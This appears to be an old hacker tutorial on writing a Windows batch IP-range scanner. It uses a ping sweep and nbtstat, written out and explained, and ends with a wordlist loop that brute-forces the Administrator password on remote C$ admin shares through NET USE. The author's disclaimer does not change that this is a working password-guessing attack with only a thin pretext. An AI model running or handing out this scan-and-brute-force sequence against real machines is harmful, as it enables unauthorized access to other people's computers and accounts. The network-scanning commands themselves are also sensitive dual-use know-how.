Ip-scanner maken

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How to make an IP range scanner with dos.
Many are quick to say windows is lame. well it might not be as stable and might not come with
all the third party software *nix has but an operating system is only as lame as its operator.now
i can think of a dozen boring examples but nobody would pay any attention so i made a up a
simple scenerio that might get some to really try to learn their OS.

(lame though it may be it's just to illiustrates a point)

What i dont have a scanner on this computer im on and can't download EXEs...no prob! this is an NT based box and i know my shit:


REM all the text for each "for" statement
REM must be on one line

for /L %%x IN (1,1,255) DO ping -n 1 10.0.0.%%x | find /I "reply" >>pg.txt

for /F "tokens=1 delims=:" %%x in (pg.txt) DO echo %%x >>pg2.txt

for /f "tokens=3" %%x IN (pg2.txt) DO nbtstat -A %%x |more >>pg3.txt

You could enter it one line at a time at the command prompt without makeing a batchfile, but thats not nearly as much fun

in the first "for" statement, (1,1,255) says: make %%x egual 1 incremanting by 1 each loop until it reaches 255. In a batch file '%' by itself will be removed so it must be used twice: "%%"

ping returns:

Reply from bytes=32 time=150ms TTL=59

by changing the default delimiter to a colon, splitting the line into 2 tokens in pg2.txt and printing only the first and removing the colon because it is the delimiter ( tokens=1 delims= leaving only:

Reply from

in the third "for" statement we used the default or "space" delimiter making the IP addy the

third token (token=3) and using nbtstat -A we record the results to pg3.txt

now its time for to get yourself a drink and go to the bathroom before you get into the long haul:

for /f "tokens=1" %%x in (wordlist.txt) do NET USE \\\c$ /user: Administrator %%x

This is all done with out using some stupid poorly made program that may contain a trojan.

your on your own from here, im not trying to teach you to break into a computer there's enough written in tutorials to show you that, but rather show you what you can do if you know you OS. just remember if you try this on the net you could get screwed. There is nothing stealth about this.

Have a happy new year and resolve to really learn what you have. Dont wait for that special book or turtorial to come along....just do it
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